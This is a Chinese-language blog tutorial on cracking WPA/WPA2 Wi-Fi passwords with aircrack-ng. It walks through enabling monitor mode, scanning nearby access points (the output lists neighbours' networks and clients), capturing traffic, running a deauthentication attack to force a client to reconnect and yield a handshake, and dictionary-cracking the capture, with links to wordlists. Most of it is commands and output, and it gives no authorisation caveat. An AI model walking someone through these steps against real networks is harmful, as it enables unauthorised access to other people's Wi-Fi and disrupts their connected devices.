• aircrack-ng 字典破解WPA / WPA2


    1. 安装

    首先安装两个扩展
    sudo apt-get install build-essential
    sudo apt-get install libssl-dev

    然后到http://download.aircrack-ng.org/aircrack-ng-1.1.tar.gz 下载最新版的aircrack-ng,解压它
    tar -zxvf aircrack-ng-1.1.tar.gz
    cd aircrack-ng-1.1
    gedit common.mak
    找到 CFLAGS ?= -g -W -Wall -Werror -O3 并把它改为
    CFLAGS ?= -g -W -Wall -O3
    保存好后,开始编译安装
    make
    sudo make install
    完了之后它会提示 Run ‘airodump-ng-oui-update’ as root (or with sudo) to install or update Airodump-ng OUI file (Internet connection required).
    于是输入
    sudo airodump-ng-oui-update
    更新好后即可。

    2. 启动无线网卡监控模式:

    wy@wy-Inspiron-7420:~$ sudo airmon-ng start wlan0
    
    
    Found 5 processes that could cause trouble.
    If airodump-ng, aireplay-ng or airtun-ng stops working after
    a short period of time, you may want to kill (some of) them!
    -e 
    PID    Name
    953    avahi-daemon
    954    avahi-daemon
    985    NetworkManager
    1206    wpa_supplicant
    18593    dhclient
    Process with PID 18593 (dhclient) is running on interface wlan0
    
    
    Interface    Chipset        Driver
    
    wlan0        Intel 2230    iwlwifi - [phy0]
                    (monitor mode enabled on mon0)

    3. 扫描无线AP,找到满意的热点之后,ctrl+c终止扫描:

    上部分为热点列表,下部分为连接在热点上的客户端的列表。

    wy@wy-Inspiron-7420:~$ sudo airodump-ng mon0 
    
    CH 11 ][ Elapsed: 8 s ][ 2014-05-18 11:55                                         
                                                                                                                                                                                             
     BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                                                                                                                                             
     08:10:77:AA:XX:82  -88        2        0    0   6  54e  WPA2 CCMP   PSK  Netcore                                                           
     D8:15:0D:21:XX:CA  -84        2        0    0   6  54e. WPA2 CCMP   PSK  TP-LINK_211CCA                                                    
     14:E6:E4:93:XX:48  -87        2        0    0   6  54e. WPA2 CCMP   PSK  TP-LINK_936048                                                    
     D8:15:0D:1B:XX:A6  -86        2        0    0   6  54e. WPA2 CCMP   PSK  Wiann2061                                                         
     00:36:76:18:XX:28  -50       83       39    2  11  54e. WPA2 CCMP   PSK  kk-link                                                           
     A4:17:31:38:XX:CC  -63        0        0    0  11  54e  WPA2 CCMP   PSK  mayouyou                                                          
     00:87:36:08:XX:2C  -68        5        0    0   6  54e. WPA2 CCMP   PSK  360WiFi-482C                                                      
     CC:34:29:40:XX:16  -127        0      110   22  11  -1   WPA              <length:  0>                                                                                                   
                                                                                                                                                
     BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                                                                                
                                                                                                                                                
     00:36:76:18:XX:28  68:17:29:AF:XX:4C    0    0e- 0e     0       40                                                                         
     CC:34:29:40:XX:16  8C:7B:9D:86:XX:3B   -1    0e- 0      0        4                                                                         
     CC:34:29:40:XX:16  0C:82:68:2A:XX:E3   -1    0e- 0      0       11                                                                         
     CC:34:29:40:XX:16  0C:82:68:2A:XX:F4   -1    0e- 0      0       95                                                                         
    
    wy@wy-Inspiron-7420:~$ 

    4. 抓包

    sudo airodump-ng -c 6 –w longas mon0 
    这个窗口不要关。

    参数解释:

    -c 这里我们设置目标AP的工作频道,通过观察,我们要进行攻击测试的无线路由器工作频道为6;

    -w 后跟要保存的文件名,这里w就是“write写”的意思,所以输入自己希望保持的文件名,这里我就写为longas。那么,小黑们一定要注意的是:这里我们虽然设置保存的文件名是longas,但是生成的文件却不是longas.cap,而是longas-01.cap。

    5.攻击

    sudo aireplay-ng -0 1 –a AP的mac -c 客户端的mac mon0 

    参数解释:

    -0 采用deauth攻击模式,后面跟上攻击次数,这里我设置为1,大家可以根据实际情况设置为10不等;

    -a 后跟AP的MAC地址;

    -c 后跟客户端的MAC地址;

    若第三步的窗口中出现握手包,表示攻击有效。

    6. 破解

    sudo aircrack-ng -w dic 捕获的cap文件 

    7. 破解完成之后关闭虚拟网卡mon0

    wy@wy-Inspiron-7420:~$ sudo airmon-ng stop mon0
    
    
    Interface    Chipset        Driver
    
    wlan0        Intel 2230    iwlwifi - [phy0]
    mon0        Intel 2230    iwlwifi - [phy0] (removed)

    字典文件下载地址:

    http://bbs.ecjtu.org/thread-29817-1-1.html

    http://www.aircrack-ng.org/doku.php?id=faq#where_can_i_find_good_wordlists 

    详细步骤查看:http://netsecurity.51cto.com/art/201105/264844_all.htm

  • 相关阅读:
    expect脚本实例
    Linux dialog详解(图形化shell)
    makefile——小试牛刀
    gdb入门
    linux常见系统调用函数列表
    linux前后台任务的切换以及执行暂停
    centos 7.0 lnmp安装部署步骤
    环境列表
    setjmp与longjmp非局部跳转函数的使用
    malloc,calloc,alloca和free函数
  • 原文地址:https://www.cnblogs.com/duanguyuan/p/3735046.html
Copyright © 2020-2023  润新知